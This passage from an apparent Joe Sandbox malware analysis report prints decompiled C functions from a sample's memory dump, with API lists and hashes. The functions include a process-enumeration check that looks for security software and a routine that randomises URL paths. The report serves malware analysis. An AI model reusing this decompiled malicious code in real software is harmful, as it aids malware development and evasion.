                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                  • String ID:
                                                  • API String ID: 602384898-0
                                                  • Opcode ID: 0b182b20d505355d82d0a363234248b9784f7d47cda3517603db9ba9d035c0cd
                                                  • Instruction ID: 11ee154e30b684032079f6882be6a132f91a021b171e6f0932a804a6c7c628d3
                                                  • Opcode Fuzzy Hash: 0b182b20d505355d82d0a363234248b9784f7d47cda3517603db9ba9d035c0cd
                                                  • Instruction Fuzzy Hash: 923120B5900708EFEB21DFE6D8C099EBBB8EF09341F2045AAE542E2140D775EE549F60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B33BF1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 40%
                                                  			E04B33BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04B39763(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E04B3A022(_t23);
						}
					}
					return _t38;
				}
				if(E04B3A72D(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x4b3d2a8, 1, 0,  *0x4b3d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04B38A51(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04B317D5(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04B31F99(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04B342EA( &_v32, _t39);
					goto L13;
				}
			}












                                                  0x04b33bf1
                                                  0x04b33bfe
                                                  0x04b33c04
                                                  0x04b33c05
                                                  0x04b33c06
                                                  0x04b33c07
                                                  0x04b33c08
                                                  0x04b33c0c
                                                  0x04b33c18
                                                  0x04b33c1c
                                                  0x04b33ca4
                                                  0x04b33ca4
                                                  0x04b33ca7
                                                  0x04b33ca9
                                                  0x04b33cb1
                                                  0x04b33cb1
                                                  0x04b33cb7
                                                  0x04b33cba
                                                  0x04b33cba
                                                  0x04b33cb7
                                                  0x04b33cc5
                                                  0x04b33cc5
                                                  0x04b33c2f
                                                  0x04b33c31
                                                  0x04b33c31
                                                  0x04b33c48
                                                  0x04b33c4c
                                                  0x04b33c4f
                                                  0x04b33c5a
                                                  0x04b33c61
                                                  0x04b33c61
                                                  0x04b33c6d
                                                  0x04b33c6e
                                                  0x04b33c7c
                                                  0x04b33c70
                                                  0x04b33c70
                                                  0x04b33c71
                                                  0x04b33c72
                                                  0x04b33c73
                                                  0x04b33c74
                                                  0x04b33c75
                                                  0x04b33c75
                                                  0x04b33c81
                                                  0x04b33c86
                                                  0x04b33c88
                                                  0x04b33c8a
                                                  0x04b33c8a
                                                  0x04b33c91
                                                  0x00000000
                                                  0x04b33c93
                                                  0x04b33c93
                                                  0x04b33ca0
                                                  0x00000000
                                                  0x04b33ca0

                                                  APIs
                                                  • CreateEventA.KERNEL32(04B3D2A8,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,04B36880,?,00000001,?), ref: 04B33C42
                                                  • SetEvent.KERNEL32(00000000,?,?,?,04B36880,?,00000001,?,00000002,?,?,04B32417,?), ref: 04B33C4F
                                                  • Sleep.KERNEL32(00000BB8,?,?,?,04B36880,?,00000001,?,00000002,?,?,04B32417,?), ref: 04B33C5A
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,04B36880,?,00000001,?,00000002,?,?,04B32417,?), ref: 04B33C61
                                                    • Part of subcall function 04B38A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,04B33C81,?,04B33C81,?,?,?,?,?,04B33C81,?), ref: 04B38B2B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                  • String ID:
                                                  • API String ID: 2559942907-0
                                                  • Opcode ID: c8af90ad5ddf4536dd0f58b6a4a8e3cc6118f07163bf06eb4541a1660004cc47
                                                  • Instruction ID: 796bdb19c400e08963bae003c9698d53536736301eab29ffdf19e1ba20a081d4
                                                  • Opcode Fuzzy Hash: c8af90ad5ddf4536dd0f58b6a4a8e3cc6118f07163bf06eb4541a1660004cc47
                                                  • Instruction Fuzzy Hash: E121A473900209ABDB10AFF688848EFB7BDEB44656B4545A5EE11A7100D738FD458BA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B31A70, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E04B31A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04B32049(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                  0x04b31a7c
                                                  0x04b31a80
                                                  0x04b31a81
                                                  0x04b31a82
                                                  0x04b31a84
                                                  0x04b31a86
                                                  0x04b31a8b
                                                  0x04b31a8e
                                                  0x04b31b25
                                                  0x04b31b2c
                                                  0x04b31b2c
                                                  0x04b31a97
                                                  0x04b31a9e
                                                  0x04b31aae
                                                  0x04b31aae
                                                  0x04b31ab4
                                                  0x04b31ab6
                                                  0x04b31abb
                                                  0x04b31ac4
                                                  0x04b31acc
                                                  0x04b31acf
                                                  0x04b31ada
                                                  0x04b31ade
                                                  0x04b31ae0
                                                  0x04b31ae1
                                                  0x04b31aea
                                                  0x04b31aee
                                                  0x04b31aff
                                                  0x04b31af0
                                                  0x04b31af5
                                                  0x04b31afa
                                                  0x04b31b09
                                                  0x04b31b09
                                                  0x04b31ade
                                                  0x04b31b0f
                                                  0x04b31b15
                                                  0x04b31b15
                                                  0x04b31b1e
                                                  0x04b31b23
                                                  0x04b31b23
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1198164300-0
                                                  • Opcode ID: 74ada3d885bf1eec13aac1d74ad7a2b1952c6cfa3f2ae3eed98a00c051040389
                                                  • Instruction ID: 6bae12b080ef7d79066ba6d08e3434eccf455bef083562b806b9fb2295e420a2
                                                  • Opcode Fuzzy Hash: 74ada3d885bf1eec13aac1d74ad7a2b1952c6cfa3f2ae3eed98a00c051040389
                                                  • Instruction Fuzzy Hash: 71213075A00209EFDB11DFA9D88499EBBB9FF49316B1481E9E905E7210FB30AA45CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B3788B, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E04B3788B(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x4b3d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x4b3d250; // 0x6a8ac61e
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x4b3d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                  0x04b37893
                                                  0x04b37896
                                                  0x04b3789c
                                                  0x04b378b4
                                                  0x04b378b8
                                                  0x04b378bb
                                                  0x04b378bd
                                                  0x04b378c0
                                                  0x04b378c2
                                                  0x04b378c5
                                                  0x04b378c7
                                                  0x04b378c7
                                                  0x04b378c9
                                                  0x04b378d4
                                                  0x04b378d9
                                                  0x04b378ea
                                                  0x04b378f2
                                                  0x04b378f7
                                                  0x04b378fa
                                                  0x04b378fd
                                                  0x04b378ff
                                                  0x04b37905
                                                  0x04b37908
                                                  0x04b37908
                                                  0x04b37908
                                                  0x04b37913
                                                  0x04b37918
                                                  0x04b37922

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04B3839A,00000000,?,?,04B3A428,?,06AF95B0), ref: 04B37896
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 04B378AE
                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04B3839A,00000000,?,?,04B3A428,?,06AF95B0), ref: 04B378F2
                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 04B37913
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                  • String ID:
                                                  • API String ID: 1819133394-0
                                                  • Opcode ID: 547af6ce49e970f96a9174037074b8ebbd41f5d100f13d036e1e2a49f3b1650b
                                                  • Instruction ID: 843ead2e614d8e9f750f3f46837c23ed56a37a57f38440ad85373365217f5164
                                                  • Opcode Fuzzy Hash: 547af6ce49e970f96a9174037074b8ebbd41f5d100f13d036e1e2a49f3b1650b
                                                  • Instruction Fuzzy Hash: 6F11CAB2A00115BFD7108B6BDC84E9EBFAEDB85352F0542A6F50597140EA74AE14C760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B37A9A, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E04B37A9A(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E04B36B43(_t8, _t1);
				_t16 = E04B32049(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E04B386D8(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E04B32049(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E04B39039(_t16);
				}
				return _t18;
			}









                                                  0x04b37aa5
                                                  0x04b37aa6
                                                  0x04b37aa9
                                                  0x04b37aab
                                                  0x04b37ab6
                                                  0x04b37aba
                                                  0x04b37abf
                                                  0x04b37ac3
                                                  0x04b37acb
                                                  0x04b37ad0
                                                  0x04b37ad8
                                                  0x04b37ad8
                                                  0x04b37ae1
                                                  0x04b37ae5
                                                  0x04b37aeb
                                                  0x04b37aee
                                                  0x04b37af4
                                                  0x04b37af4
                                                  0x04b37afc
                                                  0x04b37afc
                                                  0x04b37b03
                                                  0x04b37b03
                                                  0x04b37b0e

                                                  APIs
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                    • Part of subcall function 04B386D8: wsprintfA.USER32 ref: 04B38734
                                                  • lstrlen.KERNEL32(04B323E9,00000000,00000000,00000027,00000005,00000000,00000000,04B396DA,74666F53,00000000,04B323E9,04B3D00C,?,04B323E9), ref: 04B37AD0
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04B37AF4
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 04B37AFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                  • String ID: Soft
                                                  • API String ID: 393707159-3753413193
                                                  • Opcode ID: a8d6cfb4cd9a93281d13efc9eceed7c34255ec6772c6cbf2271817d83fada469
                                                  • Instruction ID: f453b4088e72beefe5f3113fbec2937487d15b0decaa0a94dfe9717b3e1e3b92
                                                  • Opcode Fuzzy Hash: a8d6cfb4cd9a93281d13efc9eceed7c34255ec6772c6cbf2271817d83fada469
                                                  • Instruction Fuzzy Hash: 4B01A772100215B7DB127BB79C84EEF7B79DF84247F0484A2F50556100EB799A49C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B3757F, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E04B3757F() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x4b3d27c; // 0x1fba5a8
						_t2 = _t9 + 0x4b3ee54; // 0x73617661
						_push( &_v264);
						if( *0x4b3d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                  0x04b3758a
                                                  0x04b37594
                                                  0x04b37598
                                                  0x04b375a2
                                                  0x04b375d3
                                                  0x04b375a9
                                                  0x04b375ae
                                                  0x04b375bb
                                                  0x04b375c4
                                                  0x04b375db
                                                  0x04b375c6
                                                  0x04b375ce
                                                  0x00000000
                                                  0x04b375ce
                                                  0x04b375dc
                                                  0x04b375dd
                                                  0x00000000
                                                  0x04b375dd
                                                  0x00000000
                                                  0x04b375d7
                                                  0x04b375e3
                                                  0x04b375e8

                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04B3758F
                                                  • Process32First.KERNEL32(00000000,?), ref: 04B375A2
                                                  • Process32Next.KERNEL32(00000000,?), ref: 04B375CE
                                                  • CloseHandle.KERNEL32(00000000), ref: 04B375DD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 748a3ea80ce79bdbe3544b5402363096a2ab792e214ea58be0e0cc189508c17b
                                                  • Instruction ID: 3dcc61e566c2519fe6dfaa60cc70ea91e23265c2e9867aa810a83e2cb073817c
                                                  • Opcode Fuzzy Hash: 748a3ea80ce79bdbe3544b5402363096a2ab792e214ea58be0e0cc189508c17b
                                                  • Instruction Fuzzy Hash: B2F096B26051295ADB20A7779C48DEB36ECDBC4617F0140E2F905D3000EF34ED494AB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B37C61, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E04B37C61(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                  0x04b37c6b
                                                  0x04b37c6f
                                                  0x04b37c84
                                                  0x04b37c88
                                                  0x04b37c8b
                                                  0x04b37c91
                                                  0x04b37c95
                                                  0x04b37c98
                                                  0x04b37ca3
                                                  0x04b37c9a
                                                  0x04b37c9a
                                                  0x04b37c9a
                                                  0x04b37c98
                                                  0x04b37cb1

                                                  APIs
                                                  • memset.NTDLL ref: 04B37C6F
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 04B37C84
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04B37C91
                                                  • CloseHandle.KERNEL32(?), ref: 04B37CA3
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CreateEvent$CloseHandlememset
                                                  • String ID:
                                                  • API String ID: 2812548120-0
                                                  • Opcode ID: 0b6b41327900ca13487549bb22fa7a93f0e4fd3606e0c9d013b1a7b32014d88a
                                                  • Instruction ID: e24800cf00e83df4504aac24fbf5cb55d9f8eb52ba7de860d3b4c1ca9acc89df
                                                  • Opcode Fuzzy Hash: 0b6b41327900ca13487549bb22fa7a93f0e4fd3606e0c9d013b1a7b32014d88a
                                                  • Instruction Fuzzy Hash: 4AF0DAF5104308AFE2105F67DCC482BBBACEB852DAB51896EB04692541DA36E8099AB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B375E9, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 50%
                                                  			E04B375E9(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x4b3d32c; // 0x6af95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x4b3d32c; // 0x6af95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x4b3d030) {
					HeapFree( *0x4b3d238, 0, _t8);
				}
				_t14[1] = E04B394A9(_v0, _t14);
				_t11 =  *0x4b3d32c; // 0x6af95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                  0x04b375e9
                                                  0x04b375e9
                                                  0x04b375f2
                                                  0x04b37602
                                                  0x04b37602
                                                  0x04b37607
                                                  0x04b3760c
                                                  0x00000000
                                                  0x00000000
                                                  0x04b375fc
                                                  0x04b375fc
                                                  0x04b3760e
                                                  0x04b37612
                                                  0x04b37624
                                                  0x04b37624
                                                  0x04b37634
                                                  0x04b37637
                                                  0x04b3763c
                                                  0x04b37640
                                                  0x04b37646

                                                  APIs
                                                  • RtlEnterCriticalSection.NTDLL(06AF9570), ref: 04B375F2
                                                  • Sleep.KERNEL32(0000000A,?,04B323DE), ref: 04B375FC
                                                  • HeapFree.KERNEL32(00000000,00000000,?,04B323DE), ref: 04B37624
                                                  • RtlLeaveCriticalSection.NTDLL(06AF9570), ref: 04B37640
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                  • String ID:
                                                  • API String ID: 58946197-0
                                                  • Opcode ID: 9a38d80e260f6485f27133617256bb044460d9e4eea0cc19d9120c7ac7a9040a
                                                  • Instruction ID: d0dbdb1e6f81f80ed1b717a52ec517e1ef5b39d7ba9f46edf7aecb5f650b3b82
                                                  • Opcode Fuzzy Hash: 9a38d80e260f6485f27133617256bb044460d9e4eea0cc19d9120c7ac7a9040a
                                                  • Instruction Fuzzy Hash: 40F0B7B1600281DBE7149BBBD998A197BA8EB14743F04C446F842E7250D679EC008A39
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B3970F, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E04B3970F() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x4b3d26c; // 0x31c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x4b3d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x4b3d26c; // 0x31c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x4b3d238; // 0x6700000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                  0x04b3970f
                                                  0x04b39716
                                                  0x04b39760
                                                  0x04b39762
                                                  0x04b39762
                                                  0x04b3971a
                                                  0x04b39720
                                                  0x04b39725
                                                  0x04b39729
                                                  0x04b3972f
                                                  0x04b39736
                                                  0x00000000
                                                  0x00000000
                                                  0x04b39738
                                                  0x04b3973d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04b3973d
                                                  0x04b3973f
                                                  0x04b39747
                                                  0x04b3974a
                                                  0x04b3974a
                                                  0x04b39750
                                                  0x04b39757
                                                  0x04b3975a
                                                  0x04b3975a
                                                  0x00000000

                                                  APIs
                                                  • SetEvent.KERNEL32(0000031C,00000001,04B38099), ref: 04B3971A
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 04B39729
                                                  • CloseHandle.KERNEL32(0000031C), ref: 04B3974A
                                                  • HeapDestroy.KERNEL32(06700000), ref: 04B3975A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: CloseDestroyEventHandleHeapSleep
                                                  • String ID:
                                                  • API String ID: 4109453060-0
                                                  • Opcode ID: 2123223119069690cc4104ba038d0edec02777fe4d133f245905f3b3b7217e6d
                                                  • Instruction ID: b685a76c9a67575e08780c463068edc0eba8fc5b437fac93e9ad0ee1690b9ec7
                                                  • Opcode Fuzzy Hash: 2123223119069690cc4104ba038d0edec02777fe4d133f245905f3b3b7217e6d
                                                  • Instruction Fuzzy Hash: 00F01276705310A7EB10AF77DD88B0A7BACEB00753B040651B814E72C0DBB8EC409570
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B3A5D6, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 37%
                                                  			E04B3A5D6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x4b3d32c; // 0x6af95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x4b3d32c; // 0x6af95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x4b3d32c; // 0x6af95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x4b3e836) {
					HeapFree( *0x4b3d238, 0, _t10);
					_t7 =  *0x4b3d32c; // 0x6af95b0
				}
